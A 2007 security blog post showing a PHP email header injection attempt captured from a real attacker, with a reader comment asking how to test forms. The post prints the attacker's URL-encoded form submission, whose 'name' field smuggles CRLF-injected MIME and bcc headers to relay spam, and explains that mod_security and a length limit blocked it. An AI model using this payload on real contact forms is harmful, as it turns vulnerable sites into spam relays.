Thursday, August 09, 2007

 

Sample PHP Email Injection from a real Attacker

This posting has been in my drafts for over a year. It's really interesting to see how PHP mail injection is done in the wild. Hopefully Michael doesn't mind me posting details - if he does it's not a problem since I'm sure he doesn't read these posts. :)

---------------------------------------------------------------------------

Here is a php email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.

The attack wasn't successful for 2 reasons. First mod_security was used to block certain tell-tale signs of php email injection. The second reason is that the script limits the "name" field to a reasonable number which this attempt exceeded.

text=stood8261%40spree.mnin.org&
email=stood8261%40spree.mnin.org&
Submit=stood8261%40spree.mnin.org&
name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+bound
ary%3D3cde64db239a99d3c03a2b3399a85a90%0AMIME-Version%3A+1.0%0ASubject%3A+to+himsilf%2C+a+habit+iv+dog%0Abcc%3A+charleses3229%40aol.com%0A%0AThis+is+a+mult
i-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b3399a85a90%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AC
ontent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto+s+visit%0A--3cde64db239a99d3c03a2b3399a85a90--%0A%0D%0A.%0D%0A

Labels:


# posted by Matt Richard @ 3:12 PM
Comments:
Found your blog while searching for a tool/script that let's me test for injection vulnerabilities.

I'm not a PHP coder. I pay free lancers to do things, but do not have the knowledge to test their work. Until the ISP shuts down my website for spamming via insecure form.

You had some code there. How could I use that to test a script on a local server?
# posted by Anonymous Anonymous : 10/24/2007 11:02:00 PM
 
Post a Comment





<< Home

This page is powered by Blogger. Isn't yours?

Subscribe to Posts [Atom]